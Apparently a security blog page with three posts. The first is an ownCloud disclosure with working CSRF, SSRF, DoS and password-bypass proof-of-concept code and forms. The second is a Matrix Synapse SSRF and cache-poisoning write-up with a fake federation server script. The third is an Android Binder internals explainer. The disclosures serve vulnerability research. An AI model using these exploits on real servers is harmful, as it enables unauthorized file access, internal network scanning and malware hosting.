Hacktive Security Blog

ownCloud Multiple Vulnerabilities

During one of our research activities, we discovered several flaws in the ownCloud product.
ownCloud is a popular open-source cloud service similar to Google Drive, and its most recent CVE dated back to 2017 (two years ago).
So we started looking into it and disclosed three vulnerabilities related to file sharing, which is certainly a good attack vector.

What we discovered could compromise a user's root folder (read/write) via CSRF, cause an authenticated Denial of Service, interact with local services (SSRF) and bypass password-protected images. Two of the three vulnerabilities have been fixed, but for the third one we did not receive any feedback for more than 270 days, so we decided to publish this research.

Compromise user’s root folder via CSRF

By exploiting a Cross-Site Request Forgery, it is possible to trick a user into sharing their whole root folder with another user, or through a public link that is accessible without authentication.

This is the vulnerable Request:
----
POST /ocs/v2.php/apps/files_sharing/api/v1/shares?format=json HTTP/1.1
Host: mycloud.com:8081
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ocqbn9pixyab=XXXX; oc_sessionPassphrase=XXXX
Content-Length: 52

shareType=0&shareWith=attacker&permissions=31&path=./
----
Note: ownCloud does not let users share their own root folder. It cannot be done via the GUI, and if you forge a request with '/' to indicate the root folder, an error message is returned:

[screenshot: error response]

This was not a big deal, because it was easily bypassed by using './' as the value of the 'path' parameter:

[screenshot: forged request accepted with path='./']

The 'shareType' parameter indicates the type of sharing. In this case 0 means a share with the user specified in the 'shareWith' parameter, while shareType 3 means a public share through a public link made of 15 random characters; that entropy is too high to brute-force and the implementation seems solid (this share type could still be useful when chained with an XSS). Last but not least, 'permissions' set to 31 means read and write permissions on the share.
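
As a quick illustration, the following minimal Python sketch (not part of the original PoC) reproduces the same share request with an already-authenticated session; the host and cookie values are placeholders:

import requests

TARGET = "https://mycloud.example:8081"  # placeholder host
COOKIES = {"ocqbn9pixyab": "XXXX", "oc_sessionPassphrase": "XXXX"}  # victim session cookies

resp = requests.post(
    f"{TARGET}/ocs/v2.php/apps/files_sharing/api/v1/shares?format=json",
    cookies=COOKIES,
    data={
        "shareType": 0,       # 0 = share with another user, 3 = public link
        "shareWith": "attacker",
        "permissions": 31,    # read + write
        "path": "./",         # bypasses the '/' root-folder restriction
    },
)
print(resp.status_code, resp.text)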

Simulating an offensive scenario, this could be the attacker's page:

<form name="csrf" enctype="application/x-www-form-urlencoded" method=POST action=https://TARGET/ocs/v2.php/apps/files_sharing/api/v1/shares?format=json>
    <input type=hidden name=shareType value="0">
    <input type=hidden name=shareWith value="ATTACKER">
    <input type=hidden name=permissions value="31">
    <input type=hidden name=path value="./">    
</form>

<script>
document.csrf.submit();
</script>

 

The victim visits the page:

[screenshot]

And the root folder has been shared with the attacker:

[screenshot]

It would be nice to chain this vulnerability with a Cross-Site Scripting. A request made from the same origin is not subject to CORS, so the response is readable (and it contains the public link). In that case, it would be enough to inject a script that calls the vulnerable endpoint, reads the public link from the response and sends it to the attacker. This way, the whole root folder would be easily accessible from the internet, without authentication.
But, sadly, this is not the case (and ownCloud also employs a strict CSP). We only had a CSRF, so we could only perform blind POST requests.

This scenario would still be possible with older browsers that do not enforce CORS, or with web servers configured with overly permissive policies.

Server Side Request Forgery + Denial of Service

A convenient feature is fetching files from a public link into your own (own)Cloud. When you receive a public link and want to save the file in your cloud, you can use the arrow at the top right and it will do the hard work for you:

[screenshot]

In order to fetch the file, the server has to know where to get it from, which is specified in the following request:

[screenshot]

From this parameter it is possible to perform server-side requests to arbitrary local services, including the loopback interface:

[screenshot]

And we receive the request from localhost:

[screenshot]
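
To make the idea concrete, here is a rough Python sketch for probing internal services through this feature. The endpoint and parameter names below are hypothetical placeholders (the real ones appear in the requests shown above); only the approach is illustrated:

import requests

TARGET = "https://mycloud.example:8081"
COOKIES = {"ocqbn9pixyab": "XXXX", "oc_sessionPassphrase": "XXXX"}  # authenticated session

# Hypothetical endpoint/parameter names: the real ones are visible in the screenshots
for port in (22, 80, 6379, 8080):
    r = requests.post(
        f"{TARGET}/apps/files_sharing/fetch",
        cookies=COOKIES,
        data={"remote": f"http://127.0.0.1:{port}/"},
        timeout=15,
    )
    # Differences in status code, body length or timing reveal open ports
    print(port, r.status_code, len(r.content))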

The Docker image provided in their official repository ships with Redis configured, which could be an interesting component to attack with our SSRF. In the first request we do not control many parameters, just the URI (and no CRLF injection). So we dug deeper, because the server has to make other requests in order to fetch a file from another cloud.
We analyzed the flow between two valid clouds (thanks, Burp, for the reverse proxy job) and we were right, there are multiple requests:

[screenshot]

(screenshot from ngrok, cleaner than the Burp requests)

Maybe we could get lucky and find something more useful in the later requests (some parameters are reflected from the receiver cloud's responses)... but nope, that was a dead end. After two days of fuzzing and implementing a working clone of an ownCloud receiver in Python (plus ngrok to avoid caching of a target domain), we stopped: it was not the right path, and we were spending too much time on a potential authenticated RCE valid only in some environments. Unfortunately, we could not achieve RCE.

In any case, the SSRF can be used to scan the internal network for open services and/or interact with them, and if it is pointed at a few unreachable addresses... you get a nice little Denial of Service (tested on a production server):

Burp DoS configuration:

[screenshots: Burp DoS configuration]

And a few seconds later…

[screenshot]

Bypass password protected images

When you want to share something in the cloud with non-authenticated users, you can use the 'Share with Public Link' option and protect it with a password, so that other people cannot view it even if they happen to reach the link.
When sharing images, the generated token (the 15-character one described before) can be used in the preview functionality without authentication, bypassing the required password.
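
A minimal sketch of the bypass, assuming a public preview endpoint such as /index.php/apps/files_sharing/ajax/publicpreview.php (a hypothetical path here; the actual endpoint is visible in the screenshots below) that accepts the share token without the password:

import requests

TARGET = "https://mycloud.example:8081"
TOKEN = "AAAAAAAAAAAAAAA"  # the 15-character public share token

r = requests.get(
    f"{TARGET}/index.php/apps/files_sharing/ajax/publicpreview.php",
    params={"t": TOKEN, "x": 1024, "y": 1024},
)
if r.ok and r.headers.get("Content-Type", "").startswith("image/"):
    open("leaked.png", "wb").write(r.content)  # preview retrieved without the password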
The protected shared image:

[screenshot]

Image leaked:

[screenshot]

Disclosure Timeline:

17/10/2019 - Issues reported
15/11/2019 - Requested an update since we didn't receive any reply
13/12/2019 - 2 of 3 vulnerabilities fixed
09/02/2020 - We requested an update for the third vulnerability
09/02/2020 - They're working on a patch
13/07/2020 - No patch; we informed them that we were going to publish the issues
27/07/2020 - No reply, issues published


(Alessandro Groppo)

 

Matrix Synapse 1.12.3 - SSRF and Cache poisoning

tl;dr

After some emails with the Matrix security response team, Matrix Synapse servers were found to be affected by a security issue: the lack of a validation system in the "Server-to-Server" API leads to SSRF and cache poisoning, subsequently marked by the team as a "feature" or "intended" behavior.
The scope of this article is to clarify this point: a malicious user, if not specifically denied by the configuration files, can effectively load malicious content using what is called the "Server-to-Server" API and, since the caching mechanism has a lifetime of 24 hours, host arbitrary files for that duration.
After a discussion with the team, as stated before, they came to the conclusion that this is intended behavior and that the best solution is to use an offloaded antivirus to scan the uploaded files for common malicious patterns.

In conclusion, I want to thank the security response team for the response and for having this discussion.

Responsible disclosure timeline

2020-04-29 Vendor is notified
2020-05-31 First contact with the security response team
2020-06-08 Discussion about the issue, marked as "intended"
2020-06-16 Disclosure

 

Introduction

Matrix is an open standard for decentralized, interoperable, real-time communication over IP.
This standard is widely documented and defines a set of open APIs for communication. Its main strength is the ability to build a decentralized, securely encrypted and segregated federation of servers, giving every user of the standard the following capabilities:

  • Instant Messaging (IM)
  • Voice over IP (VoIP)
  • Internet of Things (IoT) communication
  • A good amount of integrations (or bridges) with external IM/VoIP protocols like:
    • IRC
    • Skype
    • Telegram
    • WhatsApp
    • E-Mail
    • Hangouts
    • WeChat
    • Twitter
    • Keybase
  • A good and simple set of JSON REST APIs that allows developers to create their own clients or bots
  • Fully open source
  • KISS principle
  • End-to-end encryption by design

 

The federation concept

The idea behind a federated server is simple yet effective: an isolated, on-premise Matrix server is capable of interacting with other servers using a common API.
The following schema is taken from the matrix.org website:

 


Figure 1 The matrix federation architecture

Every Matrix client connected to a federated server can, if not specifically denied by configuration, communicate with people on other servers or channels. Cryptographic private keys are not shared among the federated servers.
The communication between servers is documented in the Federation API (or Server-Server API) docs.

The federation API

Matrix home-servers use the Federation API in order to communicate with each other. Home-servers interact with these APIs to push messages to users, join channels, retrieve history and query information about the users on each server, using the JSON format.
One part of this is called the "Server discovery" API, and it is the main subject of this research.


The bug - Server-Side Request Forgery and Cache Poisoning

Unless configured otherwise, Matrix home-servers allow integration with other federated servers through an exposed API. The following screenshot is an example of downloading a file hosted on the matrix.org federated server:

 

[screenshot]


The highlighted part defines which federated server should be used to download the file. By giving a different URL, the following response is received:

 


Figure 2 Original request

 


Figure 3 Callback

 

So, the federated server looks for a "server" file under the ".well-known/matrix" path. As specified in the documentation, it expects a JSON-formatted file with information about the federated server, like the following:

 


Figure 4 Expected configuration file
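
As a sketch of the attacker's side, the following minimal Python HTTP server answers the well-known lookup with a delegation document in the {"m.server": "host:port"} format described by the Matrix server discovery specification (host names are placeholders; in practice the response must be served over valid TLS, see the constraints below):

from http.server import BaseHTTPRequestHandler, HTTPServer
import json

class WellKnownHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/.well-known/matrix/server":
            body = json.dumps({"m.server": "internal-target.example:8448"}).encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(body)  # the remote home-server will follow this value
        else:
            self.send_response(404)
            self.end_headers()

# Placeholder setup: a real deployment would sit behind a TLS-terminating proxy
HTTPServer(("0.0.0.0", 80), WellKnownHandler).serve_forever()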


With this in mind, some aspects should be considered:

  • Loopback or localhost addresses, even when specified as numeric IPs (like 127.0.0.1), are blacklisted by default (the "federation_ip_range_blacklist" parameter in the "homeserver.yaml" file)
  • Protocols other than HTTP or HTTPS result in a timeout
  • 30x redirects are accepted
  • The cache lifetime is statically set to 86400 seconds (1 day). Subsequent requests to the same host return the cached result (this opens the cache poisoning scenario described later)
  • If not specified, port 8448 is used
  • The TLS certificate must be valid, so unencrypted protocols cannot be used (unless allowed in the configuration file)
     

 

The next step is to create a configuration file that points to an attacker-controlled endpoint:


Figure 6 Configuration file

 

And, after issuing another request, a callback is received:

 


Figure 8 Callback

 

In order to obtain a full exploitation scenario, a “malicious file” is created.


Figure 9 Creating a "malicious" file

 

And a new host is configured in the .well-known/matrix/server file:


Figure 10 New matrix server configuration file

 

Then, a new request for the “malicious_file” is made:

 


Figure 11 The malicious file is cached for 24h

 

So, from now on, this file will be available on the matrix.org servers for 24 hours, even if the external federated server is no longer reachable.
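
A minimal sketch of retrieving the now-cached file through the victim home-server's media repository API (the /_matrix/media/r0/download/{server}/{mediaId} route from the client-server specification; server and media names below are placeholders):

import requests

VICTIM_HOMESERVER = "https://matrix.org"   # the server that cached the file
ATTACKER_SERVER = "attacker.example"       # the "federated" origin
MEDIA_ID = "malicious_file"                # placeholder media identifier

r = requests.get(
    f"{VICTIM_HOMESERVER}/_matrix/media/r0/download/{ATTACKER_SERVER}/{MEDIA_ID}"
)
print(r.status_code, len(r.content))  # served from the cache for up to 24 hours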

 


Figure 12 File download

 

Impact of this vulnerability

An attacker could exploit these two vulnerabilities in order to:

  • Host malware or, generally speaking, infected files
  • Use it as a C2 server in order to broadcast files or messages
  • Use it to launch denial of service attacks
  • Hide the attacker's IP while sending HTTP requests (using the server as a reverse proxy)
  • If an XSS-vulnerable application is hosted on the same host, this could bypass the Same-Origin Policy and allow an attacker to embed JavaScript files directly into the application, as well as access the application cookies

Affected versions

At the time of writing, the affected version is "1.12.3", as reported by the matrix.org API:

Remediation

The remediation is simple: it is just a matter of specifying a list of whitelisted federated servers in the "/etc/matrix-synapse/homeserver.yaml" file. Unfortunately, this parameter is neither set by default nor mandatory when installing the Matrix server, and there are some considerations to keep in mind while applying this remediation (take a look at the "Final considerations and thoughts" chapter).


Figure 13 Effective remediation

Final considerations and thoughts

There are some aspects to take into consideration while analyzing this vulnerability. This flaw basically leverages a feature and, in some cases, a remediation like the one proposed in the "Remediation" chapter isn't feasible.
For a server like matrix.org, which SHOULD allow every federated server to connect and interact, the whitelist scenario may not be applicable.

DevOps teams should be aware that keeping the default settings and letting every federated server communicate with every other is a serious security risk, even though, at the same time, it is what effectively helps the "federated network" concept grow.

Fixing this vulnerability could be a serious hit to the matrix-synapse federated network idea. Imagine the case where a server blocks the ability to download files or perform requests to external locations, so files are no longer shared among federated servers: the result is that User A on server 1 cannot share files with User B on server 2, and vice versa.

Lastly, the note in the configuration file "/etc/matrix-synapse/homeserver.yaml" states:

# N.B. we recommend also firewalling your federation listener to limit
# inbound federation traffic as early as possible, rather than relying
# purely on this application-layer restriction. If not specified, the
# default is to whitelist everything.

This clearly isn’t a good solution if the server needs to be inter-connected with the rest of the world.

(Cristian 'void' Giustini)

Android IPC: Part 2 - Binder and Service Manager Perspective

Introduction

As mentioned in the previous article, Android uses the Binder for IPC communication. Good to know: the Binder was not created by Google. It first appeared in BeOS, an old OS for mobile devices. After some acquisitions, the original developers joined Android and brought the Binder with them. The OpenBinder port to Android became more implementation-specific and is a key component of the current Android OS. The official OpenBinder website is no longer up, but there are some mirrors, like this one, that contain precious documentation.

High level overview

The Binder is a kernel module written in C, mainly responsible for letting processes communicate with each other securely, transparently and easily, using a client-server architecture. The simplicity with which processes can interact is remarkable: a client application just needs to call a method provided by the service (the server in the client-server architecture), and everything in between is handled by the Binder. By 'everything in between' I mean location, delivery and credentials.

When a client needs to talk to a service, it has to locate the target service (that is, the target process). The Binder is responsible for locating the service, handling the communication, delivering messages and checking caller privileges (credentials).
The location stage is handled by the servicemanager, which acts as the endpoint mapper: it maintains a service directory that maps an interface name to a Binder handle. So, when the Binder receives a request for a specific service, it interrogates the servicemanager, which walks its service list (aka service directory) and returns a handle after some permission checks (for example the AID_ISOLATED check mentioned in the first part). If the client has permission to interact with the requested service, the Binder proxies the communication and delivers the message to the server, which processes the request and returns the result to the Binder, which in turn hands it back to the client as a 'message'. These messages are technically called 'Parcels': containers written by both client and server in order to communicate, serializing and deserializing the necessary data (parameters for clients, return values for services).

[diagram]

This is how IPC communications, at a higher level, are handled by Android.

Binder Introduction

Let's start with the main component of an IPC transaction, the Binder. As we said, the Binder is a small kernel module that acts as a messenger between clients and services. Every operation in Android goes through the Binder, which is why two researchers, Nitay Artenstein and Idan Revivo, gave an interesting talk at Black Hat 2014, 'Man in the Binder: He Who Controls IPC, Controls the Droid' (YouTube video).
This research demonstrates an advanced post-exploitation technique (a rootkit implant) that makes it possible to sniff all data passing through IPC and to manipulate network traffic and sensitive information by hooking Binder calls.

The character device at /dev/binder is readable and writable by everyone: any process can perform read and write operations on it using ioctl(). The ioctl() calls that handle the IPC connection from clients (applications) are issued by the 'libbinder.so' shared library, which is loaded into each application process. This library is responsible for the client initialization phase, setting up messages (aka Parcels) and talking to the Binder module. We will go deeper into this specific library in the next chapters, when talking about the client and service implementations.

Binder interactions (userland --> kerneland)

Before introducing more concepts, let's first look at how a basic interaction works from userland to kernel land, from a client (or a service) to the Binder kernel module.
As in any Linux-based OS, the ioctl system call is used to talk to the kernel module through the special character file '/dev/binder'. The driver accepts different request codes:

BINDER_SET_MAX_THREADS: Set the maximum number of threads in the thread pool (covered in the client/service implementation chapter)
BINDER_SET_CONTEXT_MGR: Set the context manager (the servicemanager)
BINDER_THREAD_EXIT: A thread exits the thread pool
BINDER_VERSION: Get the Binder version
BINDER_WRITE_READ: The most used code, used for client and service requests
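
As a quick illustration of how userland talks to the driver, here is a minimal sketch (not from the original article) that queries BINDER_VERSION through ioctl(); it assumes Python is available on the device (e.g. via Termux) and that the caller is allowed to open /dev/binder:

import ctypes
import fcntl
import os
import struct

def _IOWR(ioc_type, nr, size):
    # Linux generic ioctl encoding: dir(2 bits) | size(14 bits) | type(8 bits) | nr(8 bits)
    _IOC_WRITE, _IOC_READ = 1, 2
    return ((_IOC_READ | _IOC_WRITE) << 30) | (size << 16) | (ord(ioc_type) << 8) | nr

# struct binder_version { __s32 protocol_version; } -> 4 bytes
BINDER_VERSION = _IOWR('b', 9, 4)

fd = os.open("/dev/binder", os.O_RDWR)
buf = ctypes.create_string_buffer(4)
fcntl.ioctl(fd, BINDER_VERSION, buf)          # the driver fills in the protocol version
print("binder protocol version:", struct.unpack("i", buf.raw)[0])
os.close(fd)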

We will cover all the commands throughout these articles, but let's start with the BINDER_WRITE_READ request code.
The Binder module source code is at drivers/android/binder.c, where binder_ioctl() is responsible for dispatching the requests received from userland based on the request codes above. In the case of a BINDER_WRITE_READ code, binder_ioctl_write_read() is triggered and parameters are passed from userland to kernel land (and vice versa) using the binder_write_read structure:

struct binder_write_read {
    signed long write_size;     // size of the data the caller wants the driver to consume
    signed long write_consumed; // bytes actually consumed by the binder driver
    unsigned long write_buffer; // userland buffer holding BC_* commands for the driver
    signed long read_size;      // size of the buffer available for the driver's output
    signed long read_consumed;  // bytes actually written back by the binder driver
    unsigned long read_buffer;  // userland buffer receiving BR_* commands from the driver
};

In this structure we have two main groups: write items and read items.
Write items (write_size, write_consumed, write_buffer) are used to send commands that the Binder has to execute, while read items contain transactions from the Binder to the processes that ioctl() it, which those processes have to execute.

For example, if a client needs to talk to a service, it sends a binder_write_read structure with the write items filled in. When the Binder replies, the client gets the read items filled in. Similarly, a service waiting for client interactions receives transactions from the Binder through the read items.
When talking about 'clients', I don't mean only application clients that need to perform a request in an IPC context. A client, in this context, is any process that ioctl()s the Binder. For example, a service waiting for transactions from an application is a client of the Binder, because it calls ioctl() in order to receive actions.

[diagram]

Note that in the case of a client, the ioctl() is performed when the application needs it (for example, to perform an inter-process communication), whereas a service process has threads waiting in a loop for transactions from the Binder.

Inside these read and write buffers we have further commands, which start with BC_* and BR_*. The difference is the direction the transaction is going, to or from the Binder: BR_* are commands received FROM the Binder, while BC_* are commands SENT to the Binder. To remember the difference, I think of them as 'BinderCall' (BC) and 'BinderReceive' (BR); I don't think it is an official naming convention, so just use it as a mnemonic.

An example is the most common one, TRANSACTION: we have both BC_TRANSACTION and BR_TRANSACTION.
BC_TRANSACTION goes from clients to the Binder, while BR_TRANSACTION goes from the Binder to its clients.

The Servicemanager

As illustrated in the high-level overview, the servicemanager is responsible for the location stage. When a client needs to interact with a service (through the Binder), the Binder asks the servicemanager for a handle to that service.

The servicemanager source code is located at frameworks/native/cmds/servicemanager/, where service_manager.c is responsible for initialization and for handling service-related requests. Meanwhile, binder.c (inside that path, not the kernel module) contains the code that handles the communication with the Binder, parsing the requests received from it and sending the appropriate replies.
The servicemanager is started at boot time, as defined in the /init.rc file. This init file is part of the boot image and is responsible for loading system partitions and binaries during the boot process:

/.../
# start essential services
start logd
start servicemanager
start hwservicemanager
start vndservicemanager
/.../

# When servicemanager goes down, restart all specified services
service servicemanager /system/bin/servicemanager
class core
user system
group system
critical
onrestart restart healthd
onrestart restart zygote
onrestart restart media
onrestart restart surfaceflinger
onrestart restart drm
onrestart restart perfhub
/.../

When the servicemanager is started, its main function obtains a handle to the Binder ('/dev/binder') and then calls binder_become_context_manager(), which ioctl()s the Binder with the BINDER_SET_CONTEXT_MGR command in order to declare itself as the context manager.
The context manager is crucial for the Binder, because it serves as the service locator: when the Binder needs to locate a service, it asks its context manager for a handle.
Once the registration with the Binder is done, it calls binder_loop() (from binder.c) with a callback function as parameter. This callback (svcmgr_handler) is responsible for handling service-related requests.

The job of binder_loop(), as the name says, is to start an infinite loop that receives requests from the Binder. Before entering the loop, it sends BC_ENTER_LOOPER to inform the Binder that a specific thread is joining the thread pool. The thread pool is a group of threads waiting for incoming messages from the Binder; services usually have multiple threads in order to handle multiple requests. However, the servicemanager is a single-threaded service, so this is its first and only thread.

After this notification, the servicemanager starts its infinite loop, continuously polling the Binder (using ioctl) and waiting for actions. This is managed with the BINDER_WRITE_READ command (sent to the Binder) and a binder_write_read structure whose read_* items are filled in by the Binder; as a reminder, this is the structure:

struct binder_write_read {
    signed long write_size;     // size of the data the caller wants the driver to consume
    signed long write_consumed; // bytes actually consumed by the binder driver
    unsigned long write_buffer; // userland buffer holding BC_* commands for the driver
    signed long read_size;      // size of the buffer available for the driver's output
    signed long read_consumed;  // bytes actually written back by the binder driver
    unsigned long read_buffer;  // userland buffer receiving BR_* commands from the driver
};

When the Binder needs the servicemanager to perform an action (e.g. getting a handle to a service), it returns to binder_loop() a binder_write_read structure whose read_buffer is filled with the requested transaction (and whose read_consumed holds its actual size). These two values are passed to the binder_parse() function, which starts to 'deserialize' the transaction request:

/ .. /
uintptr_t end = ptr + (uintptr_t) size; // end calculated using the bwr.read_consumed
while (ptr < end) {
    uint32_t cmd = *(uint32_t *) ptr; // the command is read from the buffer
    ptr += sizeof(uint32_t);
    // switch case on the received command
    switch(cmd) {
        // BR_NOOP is a command
        case BR_NOOP:
        break;
/../

The first 32 bits of bwr.read_buffer contain the command to be executed (CMD).
There is a long list of handled commands: BR_NOOP, BR_TRANSACTION_COMPLETE, BR_INCREFS - BR_ACQUIRE - BR_RELEASE, BR_DECREFS, BR_DEAD_BINDER, BR_FAILED_REPLY - BR_DEAD_REPLY, BR_TRANSACTION, BR_REPLY.

There are many more BR_* commands, but these are the only ones handled by the servicemanager. For example, a normal service can receive a BR_SPAWN_LOOPER command from the Binder, which requests the service to spawn a new thread in order to handle more requests. We said that the servicemanager is single-threaded, so it makes no sense for it to receive this type of request, and it is not handled. We will dig deeper into the commands used by other services in IPCThreadState.cpp in the next articles.

After the command has been extracted from the binder_write_read structure, it goes through a switch case where the commands above are handled. The most interesting one is BR_TRANSACTION, because it means that the Binder needs to retrieve a service handle or register a new service.

BR_TRANSACTION

Following the source code, we encounter some essential structures, such as binder_transaction_data, which is cast from bwr.read_buffer (referenced in the local function as ptr) + sizeof(uint32_t); that's because the first 32 bits are dedicated to the command constant.

struct binder_transaction_data *txn = (struct binder_transaction_data *) ptr;

[screenshot]

This is the binder_transaction_data structure:

//https://android.googlesource.com/kernel/msm/+/android-6.0.1_r0.74/drivers/staging/android/uapi/binder.h
struct binder_transaction_data {
/* The first two are only used for bcTRANSACTION and brTRANSACTION,
* identifying the target and contents of the transaction.
*/
    union {
        __u32 handle; /* target descriptor of command transaction */
        binder_uintptr_t ptr; /* target descriptor of return transaction */
        // in BR_TRANSACTION this must be BINDER_SERVICE_MANAGER or the service_manager return -1
    } target;
    binder_uintptr_t cookie; /* target object cookie */
    __u32 code; /* transaction command. */ // e.g. SVC_MGR_GET_SERVICE
    /* General information about the transaction. */
    __u32 flags;
    pid_t sender_pid;
    uid_t sender_euid;
    binder_size_t data_size; /* number of bytes of data */
    binder_size_t offsets_size; /* number of bytes of offsets */
    /* If this transaction is inline, the data immediately
    * follows here; otherwise, it ends with a pointer to
    * the data buffer.
    */
    union {
        struct {
            /* transaction data */
            binder_uintptr_t buffer;
            /* offsets from buffer to flat_binder_object structs */
            binder_uintptr_t offsets;
        } ptr;
        __u8 buf[8];
    } data;
};

This structure contains necessary information about the incoming request, such as the sender PID and UID to check permissions for a service, the target descriptor and the transaction command for the service manager (for example PING_TRANSACTION or SVC_MGR_CHECK_SERVICE).

The binder_transaction_data structure is then used to initialize a new binder_io (binder I/O) structure through bio_init_from_txn(), which copies data and offsets from binder_transaction_data into the new structure.

struct binder_io
{
    char *data; /* pointer to read/write from */
    binder_size_t *offs; /* array of offsets */
    size_t data_avail; /* bytes available in data buffer */
    size_t offs_avail; /* entries available in offsets array */

    char *data0; /* start of data buffer */
    binder_size_t *offs0; /* start of offsets buffer */
    uint32_t flags;
    uint32_t unused;
};

[screenshot]

The bio_* functions operate on the binder_io structure; here is an example of how that structure is filled from binder_transaction_data:

void bio_init_from_txn(struct binder_io *bio, struct binder_transaction_data *txn)
{
    bio->data = bio->data0 = (char *)(intptr_t)txn->data.ptr.buffer;
    bio->offs = bio->offs0 = (binder_size_t *)(intptr_t)txn->data.ptr.offsets;
    bio->data_avail = txn->data_size;
    bio->offs_avail = txn->offsets_size / sizeof(size_t);
    bio->flags = BIO_F_SHARED;
}

As we can see, the buffer and offsets of binder_transaction_data (including their sizes) are copied into the corresponding binder_io fields, and both structures are passed to the servicemanager callback function (the svcmgr_handler() function that service_manager.c passes to binder_loop()):

res = func(bs, txn, &msg, reply);
// func -> svcmgr_handler, defined in service_manager.c and registered via binder_loop(bs, svcmgr_handler);
// bs -> binder_state
// txn -> binder_transaction_data
// msg -> binder_io initialized from binder_transaction_data
// reply -> an empty binder_io that will contain the reply from the service manager

Now the BR_TRANSACTION is handled inside svcmgr_handler().
binder_transaction_data.target.ptr must contain BINDER_SERVICE_MANAGER in order to continue (otherwise -1 is returned), and binder_transaction_data.code contains the servicemanager command. These service commands (dispatched in a switch statement) can be:

PING_TRANSACTION: A ping to the servicemanager; it simply returns 0
SVC_MGR_GET_SERVICE - SVC_MGR_CHECK_SERVICE: Get a handle to a service; they follow the same switch path
SVC_MGR_ADD_SERVICE: Add a new service
SVC_MGR_LIST_SERVICES: List all available services

Let's start to dig into SVC_MGR_GET_SERVICE.

SVC_MGR_GET_SERVICE

This service command occurs when the Binder needs a service handle based on a service name (requested by a client).
The service name is taken from the binder_io structure (referred to as `msg` in the source) using bio_get_string16().
There are several bio_get_* functions (bio_get_uint32, bio_get_string16, _bio_get_obj, bio_get_ref). They are all wrappers around bio_get(), which retrieves the requested data type from (binder_io)bio->data. The same goes for the bio_put_* functions, used to insert data into a binder_io structure when replying to a command.
do_find_service() is called with the service name and the caller UID and PID taken from the binder_transaction_data structure, and it immediately calls find_svc(), which iterates the singly linked service list and returns an `svcinfo` structure if it matches the requested service name:

struct svcinfo
{
    struct svcinfo *next; // pointer to the next registered service
    uint32_t handle;
    struct binder_death death;
    int allow_isolated;
    uint32_t dumpsys_priority;
    size_t len;
    uint16_t name[0];
};

[screenshot]

The svcinfo structure mainly contains information about the target service.
If the requested name matches the svcinfo.name item, the structure is returned to the do_find_service() function, which is responsible for performing extra checks.
The first check is about process isolation. As discussed in the first part of this series, some services are not allowed to be called from isolated apps (such as web browsers):

if (!si->allow_isolated) {
    uid_t appid = uid % AID_USER;
    if (appid >= AID_ISOLATED_START && appid <= AID_ISOLATED_END) {
        return 0;
    }
}

In this piece of code, the UID retrieved from the binder_transaction_data struct (coming from the Binder) is checked against AID_ISOLATED_START and AID_ISOLATED_END. These UIDs (the range from 99000 to 99999) are associated with isolated processes, which can interact only with services that have svcinfo.allow_isolated set to true.
If this check passes, a SELinux permission check verifies that the sender is allowed to retrieve the service, and the handle is returned to the main switch case in the service handler. The returned handle is put inside the binder_io reply using `bio_put_ref()` and 0 is returned, meaning everything is fine. Later on we will see how the message is sent back to the Binder.

SVC_MGR_LIST_SERVICES

We can also list the available services with the SVC_MGR_LIST_SERVICES command, which iterates through the service list (svclist) and puts the result in the binder_io reply message using bio_put_string16(). There is also an interesting condition on dumpsys_priority. The priority, which can be defined while registering a new service, has three levels: CRITICAL, HIGH and NORMAL. While listing all services, we can choose to dump only the services with a specific priority (stored in the svcinfo structure).
For example, using the dumpsys utility on Android, we can specify the desired level:

adb > `dumpsys -l --priority CRITICAL`
Currently running services:
    SurfaceFlinger
    activity
    cpuinfo
    input
    notification
    window

`dumpsys -l --priority HIGH`
Currently running services:
    connectivity
    meminfo

adb > `dumpsys -l --priority NORMAL`
Currently running services:
    activity
    connectivity
    notification

SVC_MGR_ADD_SERVICE

If the requested command from the Binder is SVC_MGR_ADD_SERVICE, the Binder is proxying a client request to register a new service. Details about the new service are taken from the binder_io message (binder_io->data). The service attributes are the service name, the priority level (dumpsys_priority), the handle, and whether isolated apps are allowed to interact with the service (allow_isolated). The function do_add_service() is called with this information plus the caller UID and PID from the binder_transaction_data message.
This function is responsible for checking the caller's permissions (the process requesting the registration), starting with its UID, in order to prevent standard applications from creating a new service. This is accomplished by checking that the caller UID is below AID_APP (10000).
In Android, installed applications start from UID 10000, so the condition prevents a user application from registering a new service (or overriding an existing one). It also means that the privileged system user (UID 1000) can register a new service.
If this condition is satisfied, a SELinux check verifies that the caller process has 'add' permissions. If the caller has the rights to register a new service, find_svc() checks whether the service name has already been registered. If it already exists, the service handle is overridden with the new one and svcinfo_death() is called.
Before going in depth on this function's behaviour, let's look at the scenario where the service does not exist:

struct svcinfo *si;
/../
si->handle = handle;
si->len = len;
memcpy(si->name, s, (len + 1) * sizeof(uint16_t));
si->name[len] = '\0';
si->death.func = (void*) svcinfo_death;
si->death.ptr = si;
si->allow_isolated = allow_isolated;
si->dumpsys_priority = dumpsys_priority;
si->next = svclist;
svclist = si;
/../

[screenshot]

The code is pretty self-explanatory: it populates the new structure with the input values and updates the service list with `si->next = svclist` and `svclist = si` (linked-list behavior). And here we are back to the death handling mentioned a few lines above.

The binder_death structure, part of svcinfo, contains two items, func and ptr. ptr is a pointer to the service structure itself, and func is a function pointer to svcinfo_death().
This death function sets the service handle to 0 and informs the Binder that the service is dead using BC_RELEASE with the service handle as parameter, so the Binder can release this reference. The Binder can also use this information to inform associated clients that the service is down, using BR_DEAD_BINDER, if the clients have requested it (by sending a BC_REQUEST_DEATH_NOTIFICATION for that service to the Binder).
On the other side, when a service is registered or overridden, a BC_ACQUIRE with the service handle as parameter is sent to the Binder, together with a BC_REQUEST_DEATH_NOTIFICATION in case the service goes down (for example if it crashes).

Back to the service handler

When one of the commands described above has been executed, the Binder usually expects a reply back.
While handling commands, SVC_MGR_ADD_SERVICE puts 0 in the reply message on success (bio_put_uint32(reply, 0);) or simply returns -1 if something fails, in which case the Binder receives an empty reply (previously initialized using bio_init()).
SVC_MGR_GET_SERVICE and SVC_MGR_LIST_SERVICES behave the same way when something goes wrong (-1 and an empty reply packet); otherwise they return 0 after having filled the reply packet with the necessary values (the handle in the case of get service, and the list of services for the list command).

